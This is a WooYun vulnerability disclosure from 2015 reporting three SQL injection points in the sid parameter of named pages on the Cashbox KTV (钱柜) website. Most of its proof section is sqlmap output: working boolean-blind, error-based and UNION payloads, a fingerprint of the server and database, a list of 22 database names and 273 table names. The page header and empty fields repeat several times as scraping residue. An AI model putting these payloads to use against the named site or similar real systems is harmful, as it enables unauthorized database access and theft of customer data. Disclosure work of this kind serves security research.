钱柜官方网站三处SQL注入（影响多个数据库）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0122951

漏洞标题：钱柜官方网站三处SQL注入（影响多个数据库）

漏洞作者：路人甲

提交时间：2015-06-26 17:19

修复时间：2015-08-10 17:20

公开时间：2015-08-10 17:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-26：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-08-10：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

RT，三处sql注入

详细说明：

第一处：

http://www.cashboxparty.com/star/star_basicdata.asp?sid=22
sid参数

第二处：

http://www.cashboxparty.com/star/star_excl.asp?sid=22
sid参数

第三处

http://www.cashboxparty.com/star/star_newdisk.asp?sid=22
sid参数

其中包含多个数据库

漏洞证明：

sqlmap identified the following injection points with a total of 47 HTTP(s) requests:
---
Parameter: sid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sid=22' AND 2660=2660 AND 'oGdD'='oGdD
    Vector: AND [INFERENCE]
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: sid=22' AND 8270=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8270=8270) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(98)+CHAR(113))) AND 'rABW'='rABW
    Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
    Type: UNION query
    Title: Generic UNION query (NULL) - 19 columns
    Payload: sid=22' UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+CHAR(117)+CHAR(85)+CHAR(111)+CHAR(83)+CHAR(108)+CHAR(81)+CHAR(77)+CHAR(86)+CHAR(112)+CHAR(119)+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
    Vector:  UNION ALL SELECT [QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
current user:    'cbwebuser'
current database:    'chian'
current user is DBA:    False
available databases [22]:
[*] BookingCRM
[*] CallCenter
[*] Cashbox
[*] CashBoxParty
[*] CBMember
[*] chian
[*] dblog
[*] diamond
[*] EDM
[*] EipCB
[*] FaceBook
[*] InvestorInfo
[*] KTVEmp
[*] master
[*] model
[*] msdb
[*] official
[*] Platinum
[*] SMS
[*] StoreSMS
[*] tempdb
[*] TESTSMSDB
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sid=22' AND 2660=2660 AND 'oGdD'='oGdD
    Vector: AND [INFERENCE]
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: sid=22' AND 8270=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8270=8270) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(98)+CHAR(113))) AND 'rABW'='rABW
    Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
    Type: UNION query
    Title: Generic UNION query (NULL) - 19 columns
    Payload: sid=22' UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+CHAR(117)+CHAR(85)+CHAR(111)+CHAR(83)+CHAR(108)+CHAR(81)+CHAR(77)+CHAR(86)+CHAR(112)+CHAR(119)+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
    Vector:  UNION ALL SELECT [QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
Database: chian
[273 tables]
+-------------------------------+
| adboard                       |
| Act_100M                      |
| Act_96122_Ans                 |
| Act_96122_Coupon              |
| Act_96122_Item                |
| Act_96122_Q                   |
| Act_97014_Draw                |
| Act_Coupon_1Hr                |
| Act_Lottery                   |
| Act_Lyrics_Del                |
| Act_Lyrics_Del                |
| Act_Meal_Item                 |
| Act_Meal_Vote                 |
| CTVSuperStarList              |
| China_Act_Elva_Member_Del     |
| China_Act_Elva_Member_Del     |
| China_Act_Elva_Vote           |
| D99_CMD                       |
| D99_REG                       |
| D99_Tmp                       |
| DiamondGF                     |
| DiamondPoint                  |
| Diff_Member                   |
| Event_survey                  |
| ForiegnBillboard1_1109        |
| ForiegnBillboard1_1109        |
| ForiegnBillboard1bak          |
| ForiegnBillboard2_1109        |
| ForiegnBillboard2_1109        |
| ForiegnBillboard2bak2         |
| ForiegnBillboard2bak2         |
| Forum                         |
| GF_Info1_Business             |
| GF_Info1_Business             |
| GameAnswer                    |
| GameCoverPrize                |
| GameCoverPrize                |
| GameCoverVote                 |
| GameGate                      |
| GameInfo                      |
| GameJoin                      |
| GamePicMem                    |
| GamePicPath                   |
| GamePicPrize                  |
| GamePicVote                   |
| Game_Draw                     |
| Game_Name                     |
| Game_Prize_Name               |
| Game_Prize_Store              |
| GenericErrorLog               |
| HR_ZIPCODEDETAIL              |
| HR_ZIPCODEDETAIL              |
| HR_ZIPCODEMASTER              |
| HR_ZIPCODE_V                  |
| HackLog                       |
| IndexPic                      |
| IndexSong                     |
| IndexTitle                    |
| Job_Admin                     |
| Job_Education                 |
| Job_Family                    |
| Job_Licence                   |
| Job_Login_Log                 |
| Job_Mail_Sample               |
| Job_Parameter                 |
| Job_Recruit                   |
| Job_Resume                    |
| Job_Title                     |
| Job_Vacancy                   |
| Job_Work                      |
| Job_ZipCodeDetail             |
| Job_ZipCodeDetail             |
| Job_ZipCodeMaster             |
| Job_ZipCode_v                 |
| KNowBySongerSearchCount       |
| Ktv_Act_Block                 |
| Ktv_Act_Dept                  |
| Ktv_Act_Setup_Dept            |
| Ktv_Act_Setup_Dept            |
| Ktv_Act_Title                 |
| LNetIn_Join                   |
| LNetIn_Join                   |
| LoginKeysLog                  |
| LoginKeysLog                  |
| MSNSongDataBySmartPhone       |
| MSN_SongData1                 |
| MSN_SongData1                 |
| MemberInfoUpdateLogByWebSite  |
| MobileWebOperator             |
| MyFriends_MMS                 |
| MyFriends_MMS                 |
| MyPartyMessageLog             |
| MyPartyMessageLog             |
| My_DiningCar_Old              |
| My_DiningCar_Old              |
| My_PartyMessage               |
| NetInBase                     |
| NetInDetail                   |
| NetInSubmission               |
| NetinDrawResult               |
| NewStar2005_Main              |
| NewStar2005_SecID             |
| NewStar2005_SecSong           |
| NewStar2005_Sort              |
| NewStar2005_Vote_Deceive_Stop |
| NewStar2005_Vote_Deceive_Stop |
| NewStar2005_Vote_NameList     |
| OrderSongsLog                 |
| OrderSongsLog                 |
| ProcessFiles                  |
| Rose_Card                     |
| Rose_Dept                     |
| SearchSongDataExecuteLog      |
| Sel_Member                    |
| SellToolsAgressByMember       |
| SellToolsInfo                 |
| SongKinds                     |
| SongerNameByWiki              |
| Songs_3456                    |
| SpecialRoom_Service_EMail     |
| SysAuditResult                |
| SysExecType                   |
| SysExecuteID                  |
| SysVideoType                  |
| TempSongerInfo                |
| Tmp_Web_Menu                  |
| TransformChinaChar            |
| VideoInfoByTypeID             |
| VideoInfoByTypeID             |
| VideoJobExecuteStatus         |
| WebCouponDownLoadGather       |
| WebDiningCarMenu_old          |
| WebDiningCarMenu_old          |
| WebDiningCar_Detail           |
| WebDiningCar_Head             |
| WebDiningCar_SubDetail        |
| WebMemberSMSValidate          |
| WebSecurityDetail             |
| WebSecurityHead               |
| Women_Order                   |
| Women_Song                    |
| X_2627                        |
| X_3547                        |
| X_3898                        |
| X_4010                        |
| X_5298                        |
| X_5730                        |
| X_6993                        |
| X_7337                        |
| X_7743                        |
| X_7999                        |
| X_8562                        |
| e-coupon                      |
| aaa012701                     |
| aaa021201                     |
| act_2006party_card            |
| act_2006party_card            |
| act_2006party_starid          |
| act_cd200                     |
| act_coupon_printlog           |
| act_ecoupon_ipview            |
| act_ecoupon_pageview          |
| act_jaycoupon                 |
| act_kao_draw                  |
| act_kao_open_prize            |
| act_kao_prize                 |
| act_ksong_apply               |
| act_ksong_game                |
| act_ksong_vote                |
| act_moodstory_end             |
| act_moodstory_end             |
| act_rdate_report              |
| ad_news_onclick               |
| ad_onclick                    |
| cb_newsongday                 |
| cbweb_counter                 |
| coupon060426_record           |
| coupon060426_record           |
| coupon060701a_record          |
| coupon060701a_record          |
| diamond_store                 |
| discussion_post               |
| discussion_topics             |
| dog_photo                     |
| dog_puzzle                    |
| dog_vote_deceive_stop         |
| dog_vote_deceive_stop         |
| dog_vote_item                 |
| dtproperties                  |
| event_Chang                   |
| event_Guess                   |
| event_PAPA_VoteIP             |
| event_PAPA_VoteIP             |
| event_PAPA_VoteIP             |
| event_PAPA_backup             |
| event_PAPAid                  |
| event_SendCard                |
| foofoofoo                     |
| friend_save                   |
| goolitxt_superuser            |
| goolitxt_superuser            |
| goolitxt_vote                 |
| homepage                      |
| hr_zipcode_t                  |
| hr_zipcodedetail_t            |
| hr_zipcodemaster_t            |
| imode_song_history            |
| imode_song_history            |
| itv_box                       |
| itv_box                       |
| itv_kanban                    |
| ktv_hotnews                   |
| ktv_room                      |
| love99                        |
| magazine                      |
| mem_addr                      |
| mem_area_old                  |
| mem_area_old                  |
| mem_career                    |
| mem_cash                      |
| mem_rdate_mms                 |
| mem_rdate_mms                 |
| mem_zipcode                   |
| member_booking                |
| member_booking                |
| member_web                    |
| mg_Topic                      |
| mgpic                         |
| music_media_cd                |
| music_media_song              |
| mv_home                       |
| new_ma_users                  |
| news                          |
| newstar2006_batch             |
| newstar2006_group             |
| newstar2006_namelist          |
| newstar2006_random            |
| page_record                   |
| recomAlbum                    |
| service_email                 |
| songs1123                     |
| songs1123                     |
| songsDelete                   |
| songsNew0619                  |
| songsNew0619                  |
| songsNewbak                   |
| songs_MyRoomSong_Old          |
| songs_MyRoomSong_Old          |
| songs_SongType                |
| songs_billboard_rock_log      |
| songs_billboard_rockxml       |
| songs_jp                      |
| songs_lang2                   |
| songs_lang2                   |
| songs_mv                      |
| songs_mysong                  |
| songs_rock                    |
| songs_temp                    |
| songsbillboard1019            |
| songsbillboard1019            |
| songsbillboardbak             |
| songsnew0831                  |
| star_basicdata                |
| star_disk_photo               |
| star_disk_photo               |
| star_excl                     |
| star_photo                    |
| star_rock                     |
| star_route                    |
| subhome_diamond               |
| subtitles_subtype             |
| subtitles_subtype             |
| sysdiagrams                   |
+-------------------------------+

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0122951

漏洞标题：钱柜官方网站三处SQL注入（影响多个数据库）

相关厂商：钱柜

漏洞作者：路人甲

提交时间：2015-06-26 17:19

修复时间：2015-08-10 17:20

公开时间：2015-08-10 17:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0122951

漏洞标题：钱柜官方网站三处SQL注入（影响多个数据库）

相关厂商：钱柜

漏洞作者： 路人甲

提交时间：2015-06-26 17:19

修复时间：2015-08-10 17:20

公开时间：2015-08-10 17:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0122951"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云